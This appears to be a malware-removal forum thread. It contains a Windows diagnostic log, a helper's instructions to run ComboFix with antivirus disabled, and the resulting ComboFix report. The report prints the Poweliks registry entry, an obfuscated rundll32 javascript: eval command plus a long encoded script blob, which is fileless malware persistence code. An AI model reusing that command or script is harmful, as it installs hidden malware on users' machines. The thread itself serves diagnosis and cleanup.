Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/12/2014 00:45:43 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/12/2014 00:45:01 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084WSearch{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
 
Error: (09/12/2014 00:45:01 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084WSearch{9E175B6D-F52A-11D8-B9A5-505054503030}
 
Error: (09/12/2014 00:44:52 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084EventSystem{1BE1F766-5536-11D1-B726-00C04FB926AF}
 
Error: (09/12/2014 00:44:48 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10000) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has failed to start.
 
Module Path: C:\windows\System32\bcmihvsrv.dll
Error Code: 21
 
Error: (09/12/2014 00:44:41 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084ShellHWDetection{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (09/12/2014 00:44:33 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
discache
MpFilter
spldr
Wanarpv6
 
Error: (09/11/2014 07:02:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Microsoft Office PowerPoint 2007 (KB2596764).
 
 
Microsoft Office Sessions:
=========================
Error: (09/12/2014 09:49:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc916b401cfce2a5e91c3e8C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllfb2c76e5-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:46:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: regsvr32.exe6.1.7600.163854a5bca28ntdll.dll6.1.7600.169154ec49cafc00000290008df89168801cfce2b501bf5d6C:\windows\system32\regsvr32.exeC:\windows\SYSTEM32\ntdll.dll949944e1-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:46:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Explorer.EXE6.1.7600.167684d6878c3unknown0.0.0.000000000c0000005ffb4e0b38d001cfce1e5f8c4d59C:\windows\Explorer.EXEunknown8fe7ca2a-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:38:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc659401cfce25c25dfa46C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll7c87949c-3a1d-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:06:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc915cc01cfce1ec62e079cC:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllf70bd7ca-3a18-11e4-8580-4cedde1b1e7f
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Microsoft Office 2007 Primary Interop AssembliesSecurity Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition1603(NULL)(NULL)(NULL)
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (09/11/2014 07:01:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc9176c01cfcdadc8bc3834C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll04b32946-39a3-11e4-aa00-00266c867412
 
Error: (09/11/2014 05:45:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc911c401cfcda4012484c5C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll5e6325ad-3998-11e4-aa00-00266c867412
 
Error: (09/11/2014 05:36:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc990401cfcda0ee53f9a3C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll273e42bb-3997-11e4-aa00-00266c867412
 
 
CodeIntegrity Errors:
===================================
  Date: 2011-12-21 08:59:48.259
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.229
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.179
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.139
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.049
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.999
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.959
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.869
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Percentage of memory in use: 45%
Total physical RAM: 3061.86 MB
Available physical RAM: 1658.38 MB
Total Pagefile: 6122 MB
Available Pagefile: 4662.01 MB
Total Virtual: 2047.88 MB
Available Virtual: 1894.43 MB
 
==================== Drives ================================
 
Drive c: (S3A8572D009) (Fixed) (Total:583.02 GB) (Free:538.4 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: () (Removable) (Total:7.45 GB) (Free:4.98 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 596.2 GB) (Disk ID: 9BD1B9BA)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=583 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=17)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================

Edited by tantryl, 12 September 2014 - 02:20 AM.


#7 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 12 September 2014 - 07:07 AM

Hello again tantryl,
 
Please do the following:

 

Please be sure to run our tools with administrator rights.

Next, download ComboFix Save to the Desktop

  • Disable all antivirus and antispyware programs. Get help here
  • Now, close all open windows
  • Double-click combofix.exe to run the program
  • Follow the prompts.
  • If the option is offered, it is in your best interest to allow the download and install of the Recovery Console when prompted.
  • When told that the RC is installed correctly, press YES to continue scanning for malware.
  • ComboFix will run. Please don't click on the window while the program is running, it may cause your system to stall.
  • CF may reboot the computer and resume running when it restarts.
  • When finished, a log, ComboFix.txt, is produced.

Please provide the contents of the ComboFix report in your reply.

 

 

Have a nice day.


Best regards
 
paypal.gif
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#8 tantryl

tantryl
  • Topic Starter

  • Members
  • 31 posts
  • OFFLINE
  •  
  • Local time:05:04 PM

Posted 12 September 2014 - 11:35 AM

ComboFix 14-09-12.01 - hesperia 13/09/2014   0:15.1.4 - x86
Microsoft Windows 7 Home Premium   6.1.7600.0.1252.1.1033.18.3062.2016 [GMT 8:00]
Running from: c:\users\hesperia\Downloads\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Disabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\hesperia\AppData\Local\Microsoft\Windows\Temporary Internet Files\{60168C3A-F143-4AF9-A2B9-92DDE360BA34}.xps
c:\users\hesperia\AppData\Local\Microsoft\Windows\Temporary Internet Files\{9D591210-0E08-4DB3-A87C-AA40494B1F7B}.xps
c:\users\hesperia\AppData\Roaming\appdata
c:\users\hesperia\Documents\~WRL0693.tmp
c:\users\hesperia\Documents\~WRL1124.tmp
c:\users\hesperia\Documents\~WRL1241.tmp
c:\users\hesperia\Documents\~WRL1595.tmp
c:\users\hesperia\Documents\~WRL1731.tmp
c:\users\hesperia\Documents\~WRL2714.tmp
c:\users\hesperia\Documents\~WRL2828.tmp
c:\windows\system32\Thumbs.db
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         #@~^7H0AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7  !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crJbi)clc2U-bDWUhxO`rKMW^/kJ#*`rCJ*'Ek6~c]K+XORAxmK[rxTT=))?/(&R!+DjYMkULv$ZGU7+.YYl=s.K:~l/vWjYMkUovB[ux*+ytF(:1ZC ,!qVNV+q$4mhsD(Z44i!wX5 q^N!.HFwA-1 ^!lq,!KKz/PwEt!w!42B*h?I`^U.^|j!Lq]lm!.(p.ZoBo~tmhoD}pI^^ HdqF~tmssDt("V^k4p8fgwNVs\(L!XF#!T8IXm!#9q/IUt("F^hlj+p$^n#Yq8yVVo?0G9wIl^MjZ[^/t!jXnjOA1CAA8+F4lq*[r%2GNp9Htl!]!OY5 s!SVI^tsV;\j"*4ssDCgA^&gV8 x/+ULW::.2Ji,bls.%N/$:+p1ZtZEihj:4!#NN!V78b*$1&gV4q9knjlt8`W(sxV}saVI&I^t3I^4V.U5p]^qr3aJsDKnpg!} T!jh.s8V.%9M^\4b*w8^!J3wy^+jY5sa*5x.a8!I^m0s%5+#.mq!+6VxF8r0EI!#sl *^]_V;I8w5ZF7tCj/t?Tkj l1}qq\1xVg8+I84VjrS/]s5 6.t?0E]!j:l X^.uVStUor9Z&/q01ke(gyJs~FehXw5HaK\skt pkpq*"liHk5p1.J2wF[!Of4!o.mzqk 81X1&"V4U*g[X!Cgt^f"2}qaV\ sZt#!arHIi+p$^pU.a8M"V^rl2} ta4h.G8y*"9CxF52I7^kTkiV"K^!jLlqo/::sDtj6&lqIspUs:l mkiCjk8!^Lqra(jfV.[V.OdVxV}s6^e&"w8 WE}+w/4VsE\!178U}^4 I24+X.(PW+i&"t8h"tmh}k9oA4^ssO\("Vm HaJVgV[2^Y^!XV4q#E9MsZC ,!Is64}f\Kqs988x"w8 `/K o!5 N^t;q2}X"j+oA^}xjw8M"V^rl2}qtw(:.gtpIK4ypGqVs!Nh,Mt?&/(s~F5haa5z6&CqIs5x^KlqmkP:j&i X\[/XloB!9sk(rh0js.TNpB!.uVSt?S3i!wX5 q^N!.H^H3;` j!?qFS8MjYtl!ep"w4yXM(Ms ^zobj .;N!sD}j6geltt+j3qrVFmh.Z[o9;&Z"j+oA^}xjw8M"V^rlfms#t9M.`npA^|;3{0 t84h1ZCOE(!9t+q$4mhsD(;t8`MwX5qF^[MjXFs~\^+^!lq1EhKbkP s!}VsT4fBlnjI`^xjVF#ZoqHZmhV!t8!Lx28\}_.kt?X4iMwXe 8VNV#XnsA7^+VZlq,;nP3kK s!tMw!8fx*nj]`mU.^Fj!LqFg!msV!tFZoBs~X8+gV}_#X\?3FBo1lm2Is4io.m+.De:X*K#DAmu$A4+F4Cq*[}LafNo9Htl!]MOYe ^ES0[V92s.^+.D5s62}p\K|p6oCMjXtj8n5h2^5fIFBw%;" X\5ssk}(gyt8k8u^f5qHW\?bD} *0q;IWSVa75+sZCOEJsgh4!sZ|/91p;q2qXZ6(U*w^(jt8CtW(sg*m2]V(?*08!hb|o!{9o#!m+sstjlt[!^ }iq^N!t7t_H1xsg*m2I^8jwy^ jYehX*S0[V9sIl^!jKq0F25fB7m+,s[Zl(C WyHrXj4U14ts.6I("wNs.gt("W8 "y(r0Gms#!9(9!(/Ij4 14}h#}5pIa[:j1tp"W4+].SVN^[AFs9M4\};ob] j!iCx\eTw3}_BV1&HbFj*x4 }-l+iK9!*88MS/}/44jfs.N!.DJ^9q(x"w4qj!jl!t(x\^ogVm twI ..JVt44sId}#B^}s!KP:j&JiOklh#NN/A:no1T\ZEj .![M^Yt?l98U"Vms1h` .H[hVN}oH;?!o!}!6^i:j:F/4r}p^DK+9$tq1T&2^ENwAZ^k0/BsjE^+w:}`Xt9MVytiF^NVt-}u\!I+.ZPj!C!O3|/B_}pIg8yIq(Mjq5q*08M`kF?l98U\\lyiWxM*88!hkp;oVK 10N 6^F?0wFjS3juB75+.0[o9sn?0G0jY;n("V F8N(/"hnjOf( *ytp9Z(:WIUB74i94^ ` Hog!mhs!}zob#^V+1 1D+V,48("}e88 ^..8s("&Al h,kIsFdluob4 sniVac wY.hqa.#N^#ZNA1Fa\4A}7]:46PKxtjsxt?^stm3wDC#.ol8Nu4f#m4+6V^MXW^#aC5i2U5 t\eqF*(^..2so] w|i:wc8 ^..2#lU!.2}is~pooA3oq4 6lt283]U4q.h4bIit&is1G1 xCrqwWCF41}j^!}i"MKZ]&5(ton9AIjjIur 4mK IV\jjc^o^EK34U}!tKey*d5x4DV1~P"M^!j38!"MIA4?IV9le%9}p oA."]mIq9l V9kjoxk+u2NrowV[sN9:C^M}`6G# w2t.g& "K.ZaLj21}#sw +b,XNUs$jsqMCXI#h82?s#shWH[2pXtjxD}`p7[&4*H:OpJT"qj:#n}MoXnh,Z.01BN3H5?pIw]j4w]oa:}To~r3Ytt`19:MgZ+`6o}FgHijxx]94xjVoAd&snt!.a?^ts+i2U}#1V[!AD] 9xpio~Kf1tC:soqKIc4`6It(^HtMjwPox:l`a2U15[uNUIVVjT[ HsoW}jwpj+^.H"$$.#t"}U,B1sx:jZ6Utx^H M\I]9x9mA#Z\22yiVq.jqI]4r1U}UVAt:\&phgf.t]s}un}twsku:"vpzw`tvgr#mxanu9f4a**u(i}6ivs5z9rpi]liuan]mxz\ixDpT}MpPVlHNI}g25y.`Ia s4&Jy~5H!0hG]ntstMe+,oK^9%psojN%Vq62^!\ig9N #"pV.~}`V("!xZI`s~]&~AejwA[TwAp`}y9LV+#iN7pU%XpT2U}hVV[!AD]i\xIio~?pIt#0V6(f^ApZhMi2OD]f93P3\9Hj#C`!s+n#N\181fU2g1uId}!^yniRc1PB~4f}hCV1dt2\}NGVGj("*]2^qj3xZI`oA5.b.CP17I`2-lU2Spj/.i&9kJqx:jT]2l m8#V}j(a}N_N5}.~&CK5 }iwAp`oxt&N;]3s;Hw1tHP4~jpVt]C9pj#j:r#eZ? 6VH`Ve5"fN`6I[Fw2 M\;^V4\mZ]WI!q8}s2MH2NKmT4aH9HZCVjIjiw/I/10}#p7#s}9U3A!jAI;jjZ&}j45t!0hG]x}M1jtfWWpqIrNia$m#s~}jwfjs"VpTa$mis~}`s9:fxfNV.}}.~9tyx5\3wnm.Bwt.t Pq}IHV1.TXqNhwUH:lIC a5lTsa.st2]GN%qsa\w10}(^ZHCIci3wAp`}h5jFU}#9XI_tfK/1`}VqXHjwM\P^Aj31aHT.wCV}Ct(1!NAV5j("1}!gW^iwC4Z(\tF.x}Pt$S.AsmTHgr39s MX jU9Wpio }pNx}js$5.\ s;] 9APjwA}p\xpjoA5j9oe NASZ}4pVo;ji1tH3^5[35!.3X~jis~#:s%L&6Ks%7[y4A}j\5Jf"fjq1A`js~Pp1GK;,tNV0W1Uq7]VgW}VxIpTt2pjYhCsNo5jw9m.3l]jwM}j9Wtqw&.`o\k,I6PVK4yIoKit~pU}b#:\:eu4dj o&pip7\:Ie5"2H`s4]&42}VwZi ^.jqOC`Z,IC!1;HA6BNsodH#sM]jXD]3wIpiohri5H}q,+`:0yjqYwjKAcj3xKPu^ KyOcmFsj]VsGI_N$.zO~pVs~}jOy}TZcpTt2pjYwjqNo5jwC4Zt4jM42}VwZ#rOc.sHI`..~CpWSm8s].io rosgCMgZ\ijpUo:.+V~ioN#5?R&jqYd}jjA}.z\ !wZpytZ`j1}iV1"j.}roelIisV}j^5}i5!.!#~pis~P:t/59vH`VZtF^A]f\rip"x`oL\FN$#V6\IZsu4Ts4KptA}VwZ#rOc.hH"j#.~t.t]:4LpNsUH DI8x9.} 0cIZX.5jNn#V1"jqVGpVoKKVWXFFg!]iaZph0HIiFV}`}!(Fwsj`}~}.9X}jwA}#jCl`q?5..~#h6ISZ}pl3B;ji1An2xc^iwMpse71qsMjZso5jwpS8t4t!l\n2jI]VwM;1Mjxt;}ssGI_t$+it2?o}It&K6jp"xioAHTVdn_N q("x`s~ijwA}jDs# OA.`3\g!s~]is~pqsHl3#;ji9o#:Ic#hwsIit~?#Aw]`I}IV`6p^57HFwDj!ws}iwpS84\`V1 }ss;.;%fpiowpis~}VwIiVwAps371qsMjZso5jwpS8tKtCgpCsjjFzR\rq1AUjs~}i}}.b,*.+H"p#.~ fw Jf"fj##~jis~J2t#`.wI.`sICV~A s^q]igAI`oA:jVw}i}oKGNBj!dM?it.^jws}iwMs4$.#sMj`}/(!wx?`s~if4jjjs]VwC4Z[t\!}X}p5W.0*oIit~?p}2tXR&JT5!jTH~pis~P:t9::\fjjsxhxjx^kx\}q9C48ol( 6wjV9"+ N!r qa.#sM]XVPsxfj##jIh9&i01]\ \&p`s~tL4]3js]Vw9Ao3j.w7Jz%7Sy5a5r1VjUt;}Vwf]U9q.PB$.#sM]A}9:Vxfjj.j]:w|t3gI jOc.qOI`..~C!1;H`ttN3#npVYtnj8q^3gA|"Bl5Tt }ZNt"C^C5`wAi.gV}VwfPu4FmZO9Ltq]i.wI0sBj3V7HPV^C?Dtu1X4To4}Tp7tA1]:?Oc.oN"i.jAtXO;J+"nHjot" N0}ssA429}/07Hip7]V^c}ixIIu(H.sN}e01P:9V+ N~}jwA#Kwl !wYNwst(.}DC#.oKjNumusm4+6VC:XW^ xY5i2UV9\eqF (^..81o]&~y :O/]hXMl_o1t:sniswmqs5?hqa.#N\#!9\[#a\43tD4!tX 0N4UVxl+wVg6("YC.j(t wY+wsl( 6V8TN4?^94?hqa.#}N[j5D\VwAI34U.#9geN9!m&Th.0V`] Xwe&g3]s"CI sVj.}Dn9Aqjq.oITsI.V6&iV"?joa5jsoWHojZey!XmVwL}A}5]FxDe 88pTh.0oLt!,x o.t?w9jl3]bH!68nf~.e+w5jU$\5+IVj`N*1MjY.ZVIiF"qi:"?]!&hK sctst\ sNVHww%}3e.I 68eygjjoxVph4b4i*kC`5"m&Th.q,U M4ht283]VXMjs1L(.}Dn9AjN8VpjTsI.36&i:jW#!j5KVBWHot.e0N*9V0c}A5W]3Whe 8/8pThG$k(.x !}b?w9 jUtbIq.+nf~ i8w1 ObK IVFZmX1Fa(?AtUtxT6t2"1npTh.`oH(.9.eVVK}A9H}3tGI".kt242joxI+uH0HhhynGA#`jXYj 1bj43]383]UwZ1Aqn1V9DC#.om2oA.f#M. 2HCL9wj99&piom4+6V[0NPm28Ap`s~P"M^&tX} jD.sqctsmH\hN&?w9rl!X+}Uw+nf~(FT\s4i].K IV[2I.Uy^rHqFW\s4C}3XFPowA+`]&5(Vt63V.H^w-KrOtphoXPf"!FT89HiX$? 60eZ1+g0hHoN~6M8r]3"Yjq\Z.Zq1(ss}CsAbp.H".iG7Ho}2tyt6[T"qK!s H"s2]At]}jR\pNsWj(56^2^!]q~9NA#1UMNAn!,Z1AwBN3sx?pI"j2^!}i9Aj/O~r9IA\q,d}(a2j;,a#Kx9C.\(] ^5Hq1wj.} P"tgjVt-.io~piIH]MO!\V9949oSKf}GC:sp"0hH0Va\s41]f9L] j9mZqFq(HWt+N5KyV#HpH$.#}w}?R!^ox(+i2I31ti^t9:s\(NZpSj(~s}VjIHsxZ.0#3`c7istGIV}ep#$NN#NAtV4Ai!"IKT2s.q1n#wNX:V"jjow2} Xre3^!Phx9mw#ZjssAniIS.`Iij%o;lT1AF!A*nPI!j9]AHq.ACjo"`0yHq,UHMS*ej"!6#^q?Zt.tj,}issKjU%a.hOari1tia*P!aZpTo~pis~C:I]`4Ap`s~}.~SC.\8TZ*? oM"k%.6pw5H^1B43t\Iu}A]f"tjiwApio$.i.gCj. 1 0h. 1a[!wvJ&9r]hw9mw#pjV2y]VIKH`9.}i}7NfAl6s^pJTgEjiq Ho}.]0.tg "(p 3HP&"}e?O}# 06jo4sU(1wP#s}.ss$KVt4? 60e3^yjP\v?Ta0.+Vn wt9:V"2I`1a\F\&]f1F\3l3jj$!m:/26P1j?H%A.U["icle!xMnP`!K%sNpV5S];%X":x9NA*bj(g1Cj" P!"Lm Bfq(IVeVV.IqN-43t\?PsV]!\Z#o`!HitqIVp7#^Nj`?R6wsaJ!gri:jWi#`6KZX?\:t"J"sql8.}r#eS? 6V 306]VDMI/105#p7#sI/jM^.A!76wri:gWi a...]." ,w#PpXI s!I/1q.T22[yg&^h0h3sa+V1tt^tX::4&poN~}jxIJywCqj9?A4A53s~}i}sS8}pjs37HqtxJyw}63RcK%4~Hh,X#Z}3dF\L+V}ICV~A#y"p]h"140HZ5j9qCjYWj^. Ks[qHUA~ejwA[TwApzO~IVs~}`}tkR6}b,0iaq}Vjw\Vxxp`XA5js~Jftqrws$.ioar m2\&1D] ^Ipio~?PsVFZ}/j wZ}Zs;t!xjJyg.j ^5H.4c9F}x[!N\p`IUpio~j9tqtjjA]Vw93o0Iq9I#Ns6jsI6}b,0iaq}Vjw\Vxxpj$A5js~JftqHws$.ioaST226Kg?]hw r#[WNq}x[VNt5jjAp`s~if4 2jA]Vw9H`e\"39oJftj1ws$.ioK5T1ti:\c\3j\j9]d4s.}n_N U("x`swijwA}jj:^VxtK0q!\FV~#U5W.swopit~Kf1tJ&4( #wA.io7Hu3H}sN9:CT6rq.o6Mlf}3wZ#h0D+`}&"s9`#h,ZH`1!}uo_I%VX] O joa\43e2IhtDCj.e9wxIZ*Ut(4ICVj}H3Z*NwowjLHSn9AIN.tojit~j9tqtjjs]Vw9.3oA1o1W}js$5wx.^Vhi.\9[M9}} g&.y2K:sV_}iVZI89B43e8?PsVHj\fPsxL+oo4p+,w}`s9:VxIlwsa fg1C.Iyi ^H8swjL1jC#5.5yV H+[a.%17J&4\owI.iohr3F5C0NB53wAp s;8M1F}Vjw\Vxxp 2ZIj*x[!N\pqw#9]jIh57tsw;JT\jpVo;ji1V[Z2."jaxI`s~] Oq#!"D]sgH`[AU2FV8"AaH09UpTa5jft~}VwfPsx:+oojHi*X]y5Xt?DpS8tKe!wpCMj.}iwAp of":m8}s.aH09UpU2;5i*x[M9}} ^cHss"p#.~J.VK"ZDq48AKe!wA}jwZ^ig}.#Zj3H}hN;+094KVsZ}qV~e9?8Tw2pio~j93XJZN-5?Oc.yN"}.jAC?Of]%^x|Z#/5js~}iN7?8N3lTt:KoV_}j41]hRhlPB;}T1}is}*`?RyGtq8OlJyg5H/R*}`t&Us94e NZ`,].VsZ}qV~e&9(CsgHi[~j9oHJ2t#U.wA.`sat!5DnjAD\U9MI;1r9Ltq}V.~I0sBIP]~pTs~}j41^ wx+oshj#}x[VNt5g&.yw:Ps^C}.z*\ignlG}c`Z%7J"1j?q%zp"B;}TI7CxIyJzR!43elKf1&J.VKmV"H`N~] 9At!wA} wxp^^\sNNiisjp:}fSz0S|f1_J&4( #wA.io7Hu3H}sN3d ":lb,V (4A}Vw2^Vt\rwtY"jsV}iY}KoIUi37Hq.xJ&4(P#wA.i3yNqN$#A6t"!w9NA5l]L^V#y4E}T"Ap^](,weis~NZs$ph1;I9t~}j"p\s\ rot7IisV}`V+qjR*1:AN8M"\}jws}iw9HN[Z53.~}ihZpq1$.io8jis8}jw2nU~9HV];pVs~}`NG5("I`saJ&`DtC4\]VwHlZos5js~##AhlH,*.T#"j#.~ty4IPiZ\5V4 NTs"}`s$".~&p`sIn:Shj3wc\3gk}.]!5.V~#i}Am01O}TqUj#.~ej"w\3xxI/1V.ut~}^s/jF\/^pyP!4*JXRDP949N0[5(C}G}VsGIGN/lo]q.swIejxZ]VxIppG7H }78U,(dXR64wwqF 4nJXR\J+wAlq#Z`j9I#%s^?^99j [a.9sx[M9}}jOc.Vo"p#.~#jbXt2aZjZwU}FwDejgZ]VxIp^L " }WJz%MI_t/ph1XIi.V}j9w6owI.i37+oN7i`s#5.jprw}k]jwM}j^ iR*r:$M"sbH[h57SZs$pTaWmTt ]j\Z /R*KV[`ot+eqNKn!j|rA}~]:x\\3O:JzRX}Z#A`js~eiIUI09]ps^7+oNxi.w.} 1cjiTyIoo.JH%.m3"|rA}~j.z!J&1D]P9I?`oA"397PhV~I0sH5Tt:KoV_}jws}iwAI!1!K"H7J.Id"jafp:NW[XDs^&99}iw15ZtK:sV_}isxp`s$I!14NPm7Jy"5} "Zlj1~pVs~}`}V(!91p`}~] 1ciVw.}jOc.0#I5..~HUtS4Zs/pio~I+N\[!w.} 